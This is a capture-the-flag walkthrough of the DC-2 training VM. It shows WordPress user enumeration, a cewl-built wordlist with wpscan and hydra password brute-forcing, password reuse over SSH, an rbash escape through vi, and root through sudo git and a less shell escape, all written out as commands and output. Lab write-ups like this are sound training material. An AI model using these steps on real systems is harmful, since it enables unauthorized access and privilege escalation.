Original Description
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it’s designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts, is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.
Technical Information
DC-2 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.
While I haven’t tested it within a VMware environment, it should also work.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.
Please note that you will need to set the hosts file on your pentesting device to something like:
/etc/hosts
192.168.0.145 dc-2
- Obviously, replace 192.168.0.145 with the actual IP address of DC-2.
It will make life a whole lot simpler (and a certain CMS may not work without it).
If you’re not sure how to do this, instructions are here.
Recon
Find IP
nmap -sn 10.128.1.150-200
- scan range adjusted to my lab's DHCP range; the host that answers on 10.128.1.155 is DC-2
Create /etc/hosts entry
/etc/hosts
10.128.1.155 dc-2
Find open ports
root@kali:~/vulnhub/dc2# nmap -p- -A 10.128.1.155
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 10:29 EST
Nmap scan report for dc-2 (10.128.1.155)
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:9D:5E:27 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.11 ms dc-2 (10.128.1.155)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds
- WordPress this time (4.7.10 on Apache 2.4.10), plus OpenSSH on the non-standard port 7744. The full -p- scan matters here: 7744 is not a port a default port range is likely to cover.
WordPress
wpscan
root@kali:~/vulnhub/dc2# wpscan --url http://dc-2
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.5
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://dc-2/
[+] Started: Sun Jan 5 10:31:52 2020
Interesting Finding(s):
[+] http://dc-2/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
|
| [!] 21 vulnerabilities identified:
|
...
- WordPress 4.7.10 (released 2018-04-03): wpscan lists 21 known vulnerabilities, none of which this walkthrough ends up needing
Enumerate Users
root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 --rua --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Ok, so we found three users:
admin
jerry
tom
Opening the site's front page gave us Flag 1. So the next goal is to log in to WordPress.
The flag hints at cewl. That's a tool that spiders a website and builds a wordlist out of the words found in its pages, which is exactly what you want when a site's own text (here: lorem-ipsum filler) was used for passwords.
Generate wordlist
root@kali:~/vulnhub/dc2# cewl -w passwords http://dc-2
Find matching passwords
root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 -P passwords -U 'admin,tom,jerry'
[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
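As an added example (not from the original walkthrough, and not cewl itself), here is the core of what cewl does in POSIX shell: strip the tags from a saved page, split the text into runs of letters, drop words shorter than a minimum length (cewl's default is 3) and keep the first occurrence of each word. The function names, the file-based input (fetch the page first, e.g. curl -s http://dc-2/ > page.html) and the sample page are my own; the sample page is constructed to mimic the lorem-ipsum filler of a default WordPress site and is not DC-2's actual content.

```shell
#!/bin/sh
# Added example: the core of what cewl does, with sed/tr/awk.
# wordlist_from_html FILE [MIN_LEN] -> one candidate word per line,
# tags stripped, words shorter than MIN_LEN dropped, first occurrence kept.
wordlist_from_html() {
    file="$1"
    min_len="${2:-3}"          # cewl's default minimum word length is 3
    # 1. crude tag stripping   2. one run of letters per line
    # 3. enforce minimum length and dedupe while preserving order
    sed 's/<[^>]*>//g' "$file" \
        | tr -cs 'A-Za-z' '\n' \
        | awk -v n="$min_len" 'length($0) >= n && !seen[$0]++'
}

# Constructed sample page for the demo: lorem-ipsum filler of the kind a
# default WordPress theme ships with, not DC-2's actual content.
write_sample_page() {
    cat > "$1" <<'EOF'
<html><head><title>Just another WordPress site</title></head>
<body>
<h1>Lorem ipsum</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Orci varius
natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.</p>
<p>Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.</p>
<footer>Proudly powered by WordPress</footer>
</body></html>
EOF
}

# Feed the result to wpscan exactly as in the walkthrough:
#   wordlist_from_html page.html > passwords
#   wpscan --url http://dc-2 -P passwords -U 'admin,tom,jerry'
demo() {
    tmp="${TMPDIR:-/tmp}/cewl_demo.$$.html"
    write_sample_page "$tmp"
    wordlist_from_html "$tmp"
    rm -f "$tmp"
}

# Run the demo only when executed directly as wordlist_demo.sh.
case "$0" in *wordlist_demo.sh) demo ;; esac
```

Real cewl also follows links to a configurable depth and can pull words from document metadata; the point here is only that a site's own visible text is the password source, so the candidate list is tiny and wpscan finishes in seconds.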
So log in to WordPress as one of the two users and check Flag 2; it points you to another entry point.
SSH
Check whether one of the WordPress passwords also works on the SSH service nmap found on port 7744 (classic password reuse).
root@kali:~/vulnhub/dc2# cat users
admin
tom
jerry
root@kali:~/vulnhub/dc2# cat success_pw
parturient
adipiscing
root@kali:~/vulnhub/dc2# hydra -L users -P success_pw -u 10.128.1.155 -s 7744 ssh
[DATA] attacking ssh://10.128.1.155:7744/
[7744][ssh] host: 10.128.1.155 login: tom password: parturient
Now try ssh with user tom
root@kali:~/vulnhub/dc2# man ssh
root@kali:~/vulnhub/dc2# ssh tom@10.128.1.155 -p 7744
The authenticity of host '[10.128.1.155]:7744 ([10.128.1.155]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '[10.128.1.155]:7744' (ECDSA) to the list of known hosts.
tom@10.128.1.155's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ ls usr/bin
less ls scp vi
tom@DC-2:~$ less flag3.txt
Escape rbash
We have a very limited shell (rbash) and ~/usr/bin only contains less, ls, scp and vi, but with vi or less we can read flag3.txt.
Run external command in vi
vi can run external commands, so I tried :set shell=/bin/bash followed by :! /bin/bash from within vi. I got a better shell.
rbash only restricts the shell process itself; a program it launches (here vi, and the bash that vi spawns) is an ordinary, unrestricted process.
SHELL and PATH
The new shell still inherits rbash's PATH (only ~/usr/bin) and SHELL, so fix them:
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash
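Why the vi trick works, as an added shell example that is not part of the original walkthrough: rbash restricts only the shell process itself (no cd, no changing PATH, no slash in command names, no output redirection), while any program it launches, vi, less or even a bash found on PATH, runs as an ordinary unrestricted process. The same point is behind the sudo git escape later in this walkthrough. The helpers below (names are mine) run commands under bash -r, which is what rbash is, and assume bash is installed.

```shell
#!/bin/sh
# Added example: probe bash's restricted mode. rbash is bash started with -r.
# rbash_blocked CMD -> returns 0 if restricted bash refuses CMD, 1 if it ran.
rbash_blocked() {
    if bash -r -c "$1" >/dev/null 2>&1; then
        return 1
    else
        return 0
    fi
}

# The restrictions tom runs into on DC-2, reproduced locally.
demo_restrictions() {
    rbash_blocked 'cd /'               && echo "cd: restricted"
    rbash_blocked 'PATH=/bin:/usr/bin' && echo "PATH: read-only in rbash"
    rbash_blocked '/bin/ls /'          && echo "slash in command name: restricted"
    rbash_blocked 'echo hi >/dev/null' && echo "output redirection: restricted"
    rbash_blocked 'echo hi'            || echo "plain builtin: allowed"
}

# The escape. Restrictions live in the rbash process only; a child process
# is a normal program. vi's ":!/bin/bash" and less's "!/bin/bash" spawn such
# a child; so does typing bash (no slash, found via PATH) at the rbash prompt.
# Prints the directory the child shell could cd into, i.e. "/".
child_shell_escapes() {
    bash -r -c 'bash -c "cd / && pwd"' 2>/dev/null
}

# Once out, do what the walkthrough does: give the unrestricted child a
# usable PATH and SHELL. PATH was read-only in rbash, not in the child.
# Prints the child's PATH, which now starts with /bin:/usr/bin.
fix_env_after_escape() {
    bash -r -c 'bash -c "export PATH=/bin:/usr/bin:\$PATH SHELL=/bin/bash; echo \$PATH"' 2>/dev/null
}

# Run the demo only when executed directly as rbash_demo.sh.
case "$0" in *rbash_demo.sh) demo_restrictions; child_shell_escapes; fix_env_after_escape ;; esac
```

The defensive reading: a restricted shell is only as strong as the weakest program reachable from it, and vi, less and scp (which can run a program via -S or -o ProxyCommand) all spawn processes.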
There is no need to su to the jerry account to read flag4 (it is world-readable in his home directory), but you do need jerry to get to the last flag.
jerry wasn't allowed to log in with ssh, but su from tom's shell works:
tom@DC-2:/$ su jerry
Password:
jerry@DC-2:/$ sudo -l
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
- Use jerry's password found with wpscan (adipiscing) here.
I had some headaches working out how to get git to open a root shell.
Root Shell with git
git help add, for example, opens the man page of git add. The default program used to display it here is less, and less, like vi before, can run external commands: ! /bin/bash within less starts a new bash. jerry is allowed to run git as root via sudo, and the pager git spawns inherits that privilege, so the bash started from less is root. That's the trick to get the final flag.
The lesson is the same as with rbash: a NOPASSWD sudo rule for a program that hands control to an editor or pager hands root to whatever the user types there. less does refuse shell escapes in secure mode (LESSSECURE=1 in the environment); that is evidently not the case here, since the escape works.
jerry@DC-2:/$ sudo git help add
root@DC-2:/# cd
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat /root/final-flag.txt
So we got the Final Flag .
Flags
Flag 1
Found directly as a WordPress post:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
Flag 2
Log in to WordPress as tom or jerry and check the flag:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
Flag 3
/home/tom/flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Flag 4
/home/jerry/flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
Final Flag
/root/final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulations!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Final thoughts
This machine was really fun! I learned some new tools and ways to start shells. I had never run a shell through an editor like vi or less before.
cewl was completely new for me and I'm already thinking about how to use it more often.
Thanks to @DCAU7! Looking forward to the other machines in the DC series.